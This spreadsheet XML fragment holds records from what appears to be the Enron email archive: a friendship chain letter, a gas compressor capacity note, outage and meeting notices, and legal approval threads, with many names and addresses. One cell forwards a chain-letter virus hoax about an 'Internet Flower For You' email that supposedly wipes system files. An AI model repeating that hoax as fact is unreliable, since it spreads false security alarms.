&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;It carries over no balance. It_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;allows no overdraft._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Each day it opens a new account_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;for you. Each night it burns the_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;remains of the day. If you fail_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;to use the day's deposits, the loss is yours._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;There is no going back._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;There is no drawing against the "tomorrow."_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;You must live in the present on today's deposits._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Invest it so as to get from it_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;the utmost in health, happiness,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;and success! The clock is running._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Make the most of today._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;To realize the value of ONE YEAR,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;ask a student who failed a grade._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;To realize the value of ONE MONTH,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;ask a mother who gave birth to a premature baby._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;To realize the value of ONE WEEK,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;ask the editor of a weekly newspaper._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;To realize the value of ONE HOUR,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;ask the lovers who are waiting to meet._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;To realize the value of ONE MINUTE,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;ask a person who just missed the train._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;To realize the value of ONE-SECOND,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;ask a person who just avoided an accident._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;To realize the value of ONE MILLISECOND,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;ask the person who won a silver medal in the_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Olympics._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Treasure every moment that you have!_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;And treasure it more because you shared it with_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;someone special, special enough to spend your_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;time._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;And remember that time waits for no one._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Yesterday is history._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Tomorrow is a mystery._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Today is a gift._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;That's why it's called the present!!!_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;It's National Friendship Week._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Friends are a very rare jewel,_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;indeed. They make you smile and_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;encourage you to succeed._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;They lend an ear, they share a word of_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;praise, and they always want to_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;open their heart to us._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Send this to everyone you_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;consider a FRIEND._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;If it comes back to you_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;know you have a circle of friends_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; ----------------------- Internet Header --------------------------------_x000D_
&gt; Sender: rstevens@amelangpartners.com_x000D_
&gt; Received: from mail.engee.net (mail.netsential.com [209.113.126.3])_x000D_
&gt; by sphmgaaa.compuserve.com (8.9.3/8.9.3/SUN-1.9) with ESMTP id MAA03508;_x000D_
&gt; Sat, 6 Jan 2001 12:44:49 -0500 (EST)_x000D_
&gt; Received: from rocky2 ([208.191.150.97]) by mail.engee.net_x000D_
&gt;           (Post.Office MTA v3.5.3 release 223 ID# 0-62453U1000L100S0V35)_x000D_
&gt;           with SMTP id net; Sat, 6 Jan 2001 11:44:45 -0600_x000D_
&gt; Message-ID: &lt;003f01c0780a$3cc7b160$0500a8c0@swbell.net&gt;_x000D_
&gt; Reply-To: "Rocky Stevens" &lt;rstevens@amelangpartners.com&gt;_x000D_
&gt; From: rstevens@amelangpartners.com (Rocky Stevens)_x000D_
&gt; To: &lt;Undisclosed-Recipient:;&gt;_x000D_
&gt; Subject: Fw: Time &amp; Friends_x000D_
&gt; Date: Sat, 6 Jan 2001 11:58:10 -0600_x000D_
&gt; Organization: Amelang Partners, Inc._x000D_
&gt; MIME-Version: 1.0_x000D_
&gt; Content-Type: text/plain;_x000D_
&gt; charset="iso-8859-1"_x000D_
&gt; Content-Transfer-Encoding: 7bit_x000D_
&gt; X-Priority: 3_x000D_
&gt; X-MSMail-Priority: Normal_x000D_
&gt; X-Mailer: Microsoft Outlook Express 5.50.4133.2400_x000D_
&gt; X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 11:20:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>TW/ Agave---Atoka-3 capacity</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
This is in response to our meeting of April-10-2001 in Midland with Agave._x000D_
_x000D_
Assuming units #761 and #762 are now assigned to LEC-10" service, the below schematic is showing the capacity of the three remaining units #822, #842 and #845 at Atoka-3._x000D_
_x000D_
At suction pressure of 225 psig and discharge pressure of 560 psig the capacity is 36 mmcf/d.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The 36 mmcf/d is not a fixed capacity, if discharge pressure increases the capacity decreases. Basically it depends on the volume activities between Atoka-3 and Atoka-1 such as BP, Rio Pecos and GPM._x000D_
Please pass this on to Agave._x000D_
_x000D_
If you have any questions please call._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 09:45:41 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.steiner@enron.com'})</t>
  </si>
  <si>
    <t>Portland Computer Problems</t>
  </si>
  <si>
    <t xml:space="preserve">Last night our main 'Server' failed, and we have been working since to restore service._x000D_
 _x000D_
It looks like we lost NO data_x000D_
 _x000D_
For the time, you cannot get to your H:, P:, W:, R: (Local Drives)_x000D_
 _x000D_
I have no ETA._x000D_
 _x000D_
You will have trouble starting some programs._x000D_
 _x000D_
Terminal Server is UNAFFECTED:_x000D_
 _x000D_
Houston Based Data is UNAFFECTED:_x000D_
 _x000D_
I will follow up with more news / details later_x000D_
 _x000D_
Victor and Paul are available to help get you with anything we can._x000D_
 _x000D_
Thank you for your patience_x000D_
 _x000D_
Dave </t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 13:37:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'patrick.tucker@enron.com', 'bryant.frihart@enron.com'})</t>
  </si>
  <si>
    <t>FW: Texas Monthly November 2001: How Enron Blew It</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
-----Original Message-----_x000D_
From: Loibl, Kori _x000D_
Sent: Thursday, October 25, 2001 1:38 PM_x000D_
To: Giron, Darron C._x000D_
Subject: FW: Texas Monthly November 2001: How Enron Blew It_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Bailey, Derek _x000D_
Sent: Thursday, October 25, 2001 8:20 AM_x000D_
To: McLaughlin Jr., Errol; Loibl, Kori; Olney, Matthew; Jones, Brad; Cavazos, Amy; Vargas, Laura; Taylor, Joey; Thibaut, Dan; Couch, Greg_x000D_
Subject: FW: Texas Monthly November 2001: How Enron Blew It_x000D_
_x000D_
_x000D_
Brutal_x000D_
-----Original Message-----_x000D_
From: Anderson, Diane _x000D_
Sent: Wednesday, October 24, 2001 5:06 PM_x000D_
To: Mulvany, Patrick; Hunter, Larry Joe; Bailey, Derek; Meredith, Kevin_x000D_
Subject: FW: Texas Monthly November 2001: How Enron Blew It_x000D_
_x000D_
_x000D_
Yikes.  _x000D_
 _x000D_
 _x000D_
  &lt;http://ste.clickability.com/ste.gif?151|5180|4170|989|989|989|2577025|N|2|&gt;_x000D_
  &lt;http://images.clickability.com/eti/spacer.gif&gt;	  &lt;http://images.clickability.com/eti/spacer.gif&gt;	_x000D_
 	 Texas Monthly &lt;http://www.texasmonthly.com&gt;	   &lt;http://images.clickability.com/logos/cc0000/emailthis-logo.gif&gt; _x000D_
	_x000D_
 	  	_x000D_
  &lt;http://images.clickability.com/eti/spacer.gif&gt;	_x000D_
 	  	_x000D_
 	 You have received the following link from craig.buehler@enron.com: 	 	_x000D_
 	  	_x000D_
  &lt;http://images.clickability.com/eti/spacer.gif&gt;	_x000D_
 	  	_x000D_
 	 Click the following to access the sent link:	_x000D_
 	  	_x000D_
 	   &lt;http://images.clickability.com/partners/989/etIcon.gif&gt;Texas Monthly November 2001: How Enron Blew It &lt;http://texasmonthly.emailthis.clickability.com/et/emailThis?clickMap=viewThis&amp;etMailToID=1882864300&gt; 	_x000D_
 	  	  	_x000D_
 	 SAVE THIS link &lt;http://texasmonthly.savethis.clickability.com/st/saveThisPopupApp?clickMap=saveFromET&amp;partnerID=989&amp;etMailToID=1882864300&gt;	 FORWARD THIS link &lt;http://texasmonthly.emailthis.clickability.com/et/emailThis?clickMap=forward&amp;etMailToID=1882864300&amp;partnerID=989&gt;	_x000D_
 	_x000D_
Please note, the sender's email address has not been verified.	_x000D_
 	  	_x000D_
Get your EMAIL THIS Browser Button and use it to email information from any Web site.	  &lt;http://texasmonthly.emailthis.clickability.com/et/emailThis?clickMap=browserButtons&gt;	_x000D_
 	  	_x000D_
	  &lt;http://images.clickability.com/eti/spacer.gif&gt;	_x000D_
 	  	</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 08:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hgovenar@govadv.com', 'susan.j.mara@enron.com', 'bhansen@lhom.com', 'janel.guerrero@enron.com', 'cindy.derecskey@enron.com', 'harry.kingerski@enron.com', 'linda.robertson@enron.com', 'jeff.dasovich@enron.com', 'lora.sullivan@enron.com', 'lysa.akin@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'paul.kaufman@enron.com', 'john.neslage@enron.com', 'james.d.steffes@enron.com', 'richard.shapiro@enron.com', 'joseph.alamo@enron.com', 'leslie.lawner@enron.com', 'hgovenor@govadv.com'})</t>
  </si>
  <si>
    <t>Re: Agenda for 1:30 call on Wednesday</t>
  </si>
  <si>
    <t>I will be unable to be on the conference call tomorrow... I'm at the Loretta_x000D_
Lynch lunch._x000D_
_x000D_
I may try to call in on my cell for part of the conversation.  Is the number_x000D_
and code the same for each call?_x000D_
_x000D_
I'll report back on what she says in her appearance before the Press Club._x000D_
----- Original Message -----_x000D_
From: &lt;Janel.Guerrero@enron.com&gt;_x000D_
To: &lt;Lora.Sullivan@enron.com&gt;; &lt;Linda.Robertson@enron.com&gt;;_x000D_
&lt;Richard.Shapiro@enron.com&gt;; &lt;Mark.Palmer@enron.com&gt;;_x000D_
&lt;Karen.Denne@enron.com&gt;; &lt;James.D.Steffes@enron.com&gt;;_x000D_
&lt;Harry.Kingerski@enron.com&gt;; &lt;John.Neslage@enron.com&gt;;_x000D_
&lt;ken@kdscommunications.com&gt;; &lt;Paul.Kaufman@enron.com&gt;;_x000D_
&lt;Susan.J.Mara@enron.com&gt;; &lt;Jeff.Dasovich@enron.com&gt;;_x000D_
&lt;Sandra.McCubbin@enron.com&gt;; &lt;bhansen@lhom.com&gt;; &lt;hgovenor@govadv.com&gt;;_x000D_
&lt;Joseph.Alamo@enron.com&gt;; &lt;Cindy.Derecskey@enron.com&gt;;_x000D_
&lt;Lysa.Akin@enron.com&gt;; &lt;Leslie.Lawner@enron.com&gt;_x000D_
Sent: Tuesday, February 27, 2001 4:48 PM_x000D_
Subject: Agenda for 1:30 call on Wednesday_x000D_
_x000D_
_x000D_
&gt; (See attached file: War room agenda 2-28-01.doc)</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 13:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ronnie.morgan@enron.com'})</t>
  </si>
  <si>
    <t>Re: San Diego Invite</t>
  </si>
  <si>
    <t>Please respond to Ronnie Morgan Hi Sherri._x000D_
_x000D_
Thanks for your response on behalf of Jeff.  If Jeff can't make it, we will_x000D_
settle for second-best.  How about Ken Lay?_x000D_
_x000D_
Ronnie_x000D_
----- Original Message -----_x000D_
From: &lt;Jeff.Skilling@enron.com&gt;_x000D_
To: "Ronnie Morgan" &lt;RonnieM@morgangroup.com&gt;_x000D_
Cc: "Michael S. Morgan" &lt;MichaelM@morgangroup.com&gt;_x000D_
Sent: Tuesday, May 15, 2001 9:29 AM_x000D_
Subject: Re: San Diego Invite_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; Dear Mr. Morgan,_x000D_
&gt;_x000D_
&gt; On behalf of Jeff Skilling, thank you very much for the invitation to_x000D_
speak_x000D_
&gt; to the San Diego Chapter of YPO.  Jeff was very flattered and somewhat_x000D_
&gt; intrigued by your offer.  However, given the current demands on his time,_x000D_
&gt; he must respectfully decline your invitation._x000D_
&gt;_x000D_
&gt; Please let me know if you have any interest in another senior-level_x000D_
&gt; representative of Enron speaking to your group, and I'll be happy to do_x000D_
&gt; what I can to facilitate that for you._x000D_
&gt;_x000D_
&gt; Again, Mr. Morgan, thank you and the San Diego Chapter of YPO for the the_x000D_
&gt; opportunity._x000D_
&gt;_x000D_
&gt; Regards,_x000D_
&gt; Sherri Sera_x000D_
&gt; Assistant to Jeff Skilling_x000D_
&gt; 713.853.5984_x000D_
&gt; 713.646.8381 (fax)_x000D_
&gt; sherri.sera@enron.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; "Ronnie Morgan" &lt;RonnieM@morgangroup.com&gt; on 05/08/2001 02:33:06 PM_x000D_
&gt;_x000D_
&gt; To:   &lt;jeff.skilling@enron.com&gt;_x000D_
&gt; cc:   "Michael S. Morgan" &lt;MichaelM@morgangroup.com&gt;_x000D_
&gt;_x000D_
&gt; Subject:  San Diego Invite_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Hi Jeff._x000D_
&gt;_x000D_
&gt; I am Mike's brother, Ronnie, living in San Diego and a member of the San_x000D_
&gt; Diego Chapter of YPO.  With all the propaganda being spread about the_x000D_
&gt; electricity and energy crisis we are experiencing here in California, I_x000D_
&gt; thought it would be worthwhile to invite you to town to give us an_x000D_
&gt; insider's view on what is really going on (aka, the "truth").  Is there_x000D_
&gt; anyway you can find time in your busy schedule to visit us over dinner_x000D_
&gt; with a short talk and a question and answer period.  The sooner the_x000D_
&gt; better._x000D_
&gt;_x000D_
&gt; I will schedule a "special" meeting of our chapter to accommodate any_x000D_
&gt; dates that work for you._x000D_
&gt;_x000D_
&gt; I look forward to hearing from you._x000D_
&gt;_x000D_
&gt; Ronnie Morgan_x000D_
&gt; 760-476-0700_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Thu, 16 Mar 2000 07:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Focus Group with traders -- EnronOnline Commercial</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Peter F Keavey/HOU/ECT on 03/16/2000 _x000D_
03:54 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kal Shah                           03/16/2000 03:24 PM_x000D_
	_x000D_
_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT, Peter F Keavey/HOU/ECT@ECT, Zal _x000D_
Masani/HOU/ECT@ECT, Bill White/Corp/Enron@Enron_x000D_
cc: Brenda Flores-Cuellar/HOU/ECT@ECT, Louise Kitchen/HOU/ECT@ECT, Mark _x000D_
Palmer, Rahil Jafry, Michelle Vitrella _x000D_
Subject: Focus Group with traders -- EnronOnline Commercial_x000D_
_x000D_
As an update to my e-mail below, the EnronOnline focus group with traders _x000D_
will be held in EB3125B from Noon to 1 p.m. next Tuesday, March 21st.  I _x000D_
would greatly appreciate it if you can attend._x000D_
_x000D_
Kal Shah_x000D_
x 39354_x000D_
_x000D_
---------------------- Forwarded by Kal Shah/HOU/ECT on 03/16/2000 03:13 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kal Shah                           03/15/2000 03:52 PM_x000D_
	_x000D_
_x000D_
To: Peter F Keavey/HOU/ECT@ECT, Zal Masani/HOU/ECT@ECT, Bill _x000D_
White/Corp/Enron@Enron_x000D_
cc: Louise Kitchen/HOU/ECT@ECT, Mark Palmer, Rahil Jafry _x000D_
Subject: Focus Group with traders -- EnronOnline Commercial_x000D_
_x000D_
As per our conversation today, I am helping Enron's ad agency develop a _x000D_
television commercial about EnronOnline.  Their creative team would like to _x000D_
meet with a few Enron traders to learn first hand about what traders like, _x000D_
dislike, what motivates them, their work environment, etc.  This will help us _x000D_
make the commercial more realistic.  Would you or a couple of traders in your _x000D_
team be able to attend a focus group next Tuesday, March 21st from 11:45 to 1 _x000D_
p.m. in the Enron Building? I'll send you the meeting room info. later.  We _x000D_
will serve lunch.  Please let me know.  Your input will be very useful in _x000D_
creating an effective ad.  _x000D_
_x000D_
Kal Shah_x000D_
ext. 39354_x000D_
_x000D_
      _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Feb 2000 08:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Internal Pool Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">This conflicts with Brenda's staff meeting. Do you want to send Stacey in _x000D_
your place? Let me know_x000D_
Y_x000D_
---------------------- Forwarded by Yvette G Connevey/Corp/Enron on _x000D_
02/01/2000 03:59 PM ---------------------------_x000D_
_x000D_
_x000D_
Heather Choate@ECT_x000D_
02/01/2000 03:29 PM_x000D_
To: Randall L Gay/HOU/ECT@ECT, Katherine L Kelly/HOU/ECT@ECT, George _x000D_
Smith/HOU/ECT@ECT, Edward Terry/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Pat _x000D_
Clynes/Corp/Enron@ENRON_x000D_
cc: Yvette G Connevey/Corp/Enron@ENRON, Ragayle Pellum/HOU/ECT@ECT, Alex _x000D_
Saldana/HOU/ECT@ECT, Robert Superty/HOU/ECT@ECT, Scotty Gilbert/HOU/ECT@ECT, _x000D_
Brenda F Herod/HOU/ECT@ECT, Bryce Baxter/HOU/ECT@ECT _x000D_
_x000D_
Subject: Internal Pool Meeting_x000D_
_x000D_
_x000D_
Please plan to attend a meeting to discuss the transition from internal pools _x000D_
to service contract pools..._x000D_
_x000D_
  Wednesday, February 9, 2000_x000D_
  at 2pm in EB3084_x000D_
_x000D_
 If you are not able to attend this meeting please send someone in your _x000D_
place. _x000D_
_x000D_
 Thank you, _x000D_
 Heather Choate_x000D_
 for Scotty Gilbert_x000D_
---------------------- Forwarded by Heather Choate/HOU/ECT on 02/01/2000 _x000D_
03:23 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Scotty Gilbert                           02/01/2000 02:48 PM_x000D_
	_x000D_
_x000D_
To: Heather Choate/HOU/ECT@ECT_x000D_
cc: Randall L Gay/HOU/ECT@ECT, Katherine L Kelly/HOU/ECT@ECT, George Smith, _x000D_
Edward Terry/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Robert _x000D_
Superty/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, Bryce Baxter/HOU/ECT@ECT _x000D_
Subject: Internal Pool Meeting_x000D_
_x000D_
Heather can you set up a meeting in my office to discuss the transition from _x000D_
internal pools to service contract pools._x000D_
_x000D_
Scotty_x000D_
_x000D_
attendees _x000D_
R. Gay_x000D_
K. Kelly_x000D_
G. Smith_x000D_
E. Terry_x000D_
D. Farmer_x000D_
P. Klyne_x000D_
_x000D_
or sub if they cannot attend_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 00:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shawna.holston@enron.com', 'laura.dewett@enron.com', 'leslie.smith@enron.com', 'eve.puckett@enron.com', 'kimberly.allen@enron.com', 'melissa.murphy@enron.com', 'rhonda.denton@enron.com', 'amy.clemons@enron.com', 'rebecca.grace@enron.com', 'sharen.cason@enron.com', 'evelyn.metoyer@enron.com', 'rose.botello@enron.com', 'amber.ebow@enron.com', 'kim.theriot@enron.com', 'joy.werner@enron.com', 'stephanie.cole@enron.com', 'katrina.johnson@enron.com', 'rita.anderson@enron.com', 'angela.barnett@enron.com', 'rhonda.robinson@enron.com', 'thresa.allen@enron.com', 'dan.houston@enron.com', 'elsie.lew@enron.com', 'carolyn.gilley@enron.com', 'kim.durham@enron.com', 'judy.hernandez@enron.com', 'stacey.duplessis@enron.com', 'stephanie.piwetz@enron.com', 'laurel.bolt@enron.com', 'george.smith@enron.com', 'cheryl.slone@enron.com', 'leslie.reeves@enron.com', 'michael.jacobson@enron.com', 'kimberly.hundl@enron.com', 'kerri.thompson@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">  Subject: New Virus found!!_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
&gt;   Intel announced that a new and very destructive virus was discovered_x000D_
&gt; &gt; recently.  If you receive an email called "An Internet Flower For You",_x000D_
&gt;   do not open it._x000D_
&gt; &gt; Delete it right away! This virus removes all dynamic link libraries from_x000D_
&gt; &gt; your computer._x000D_
&gt; &gt; Your computer will not be able to boot up._x000D_
&gt; &gt;_x000D_
&gt; &gt; SEND THIS TO EVERYONE ON YOUR CONTACT LIST!!_x000D_
&gt; &gt; and..._x000D_
&gt; &gt; DO NOT OPEN "PRETTY PARK"_x000D_
&gt; &gt; It is a virus that will erase your whole "C"  drive.   It will come to_x000D_
&gt; you_x000D_
&gt; &gt; in the form of an e-mail from a familiar person._x000D_
&gt; &gt; I repeat, DO NOT OPEN "PRETTY PARK." DELETE  RIGHT AWAY!_x000D_
&gt; &gt; It gets into your address book. A "friend" sent it to  me, but called_x000D_
&gt; and_x000D_
&gt; &gt; warned me before I opened it. She was not so_x000D_
&gt; &gt; lucky and now she can't even start her computer! Forward this to_x000D_
&gt; everyone_x000D_
&gt;   in your address book. I would rather receive this warning 25 times than_x000D_
&gt;   not receive it once!_x000D_
&gt;</t>
  </si>
  <si>
    <t>Wed, 17 May 2000 11:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Modification to the PPA table</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a modified version of the proposed PPA.   (Assuming this is still _x000D_
the format) I have attempted to modify the table to better reflect a proposed _x000D_
contract for the West power projects.  Look this over and let me know your _x000D_
comments.  _x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 05:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pat.shortridge@enron.com', 'recipients@enron.com', 'ursula.brenner@enron.com', 'elizabeth.linnell@enron.com', 'ray.alvarez@enron.com', 'linda.robertson@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>New Slides for Future California/Price Cap Presentations</t>
  </si>
  <si>
    <t xml:space="preserve">I tracked down some old books and ran into a few good quotations to make some _x000D_
slides either critical of price controls in practice or showing how the _x000D_
economics profession has been opposed to maximum price ceilings._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 11:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Steel approvals</t>
  </si>
  <si>
    <t xml:space="preserve">I have no negative information on any of these proposed counterparties._x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	10/25/2000 05:55 PM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Stacy E _x000D_
Dickson/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, _x000D_
Harry M Collins/HOU/ECT@ECT, David Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Marie Heard/Enron Communications@Enron Communications, Robbi Rossi/Enron _x000D_
Communications@Enron Communications, John Viverito/Corp/Enron@Enron, Jane _x000D_
McBride/AP/Enron@Enron, Andrea Calo/SA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Steel approvals_x000D_
_x000D_
Attached are some of the new steel counterparties.  I need to give EOL _x000D_
responses by Friday for all these counterparties.  In addition, we should _x000D_
have more coming through, for a total of about 100-150 new counterparties we _x000D_
have to approve by Friday.  I will need your responses, if any, ASAP, as I _x000D_
still need to fill in Legal's approvals and return them.  Thanks!_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 10/25/2000 05:51 PM -----_x000D_
_x000D_
	Lisa Lees_x000D_
	10/25/2000 05:41 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT_x000D_
		 cc: Stacey Richardson/HOU/ECT@ECT, Naveed Ahmed/NA/Enron@Enron_x000D_
		 Subject: Steel approvals_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Lisa Lees/HOU/ECT on 10/25/2000 05:31 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Bradley Diebner_x000D_
10/25/2000 05:32 PM_x000D_
To: Lisa Lees/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Steel approvals_x000D_
_x000D_
Please distribute._x000D_
_x000D_
Thanks,_x000D_
Brad_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 12:38:03 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'n..gray@enron.com'})</t>
  </si>
  <si>
    <t>RE: More HPL money sent to ENRON</t>
  </si>
  <si>
    <t xml:space="preserve">I'm indifferent to the technicality of whether the $ is sent directly to AEP or indirectly to AEP by returning the $$ to El Paso.....I  only wished to clarify that this mistaken post-petition payment is not property of the estate.   bng_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Zisman, Stuart  _x000D_
Sent:	Wednesday, February 06, 2002 2:06 PM_x000D_
To:	Parks, Joe_x000D_
Cc:	Gray, Barbara N._x000D_
Subject:	RE: More HPL money sent to ENRON_x000D_
_x000D_
I think that is right.  So long as it is absolutely clear that the money was paid in error, return the money to El Paso that was erroneously sent by El Paso to ENA._x000D_
_x000D_
I am sending a carbon copy of this to Barbara Gray to confirm that I am giving the correct advice._x000D_
_x000D_
Stuart_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Parks, Joe  _x000D_
Sent:	Wednesday, February 06, 2002 1:42 PM_x000D_
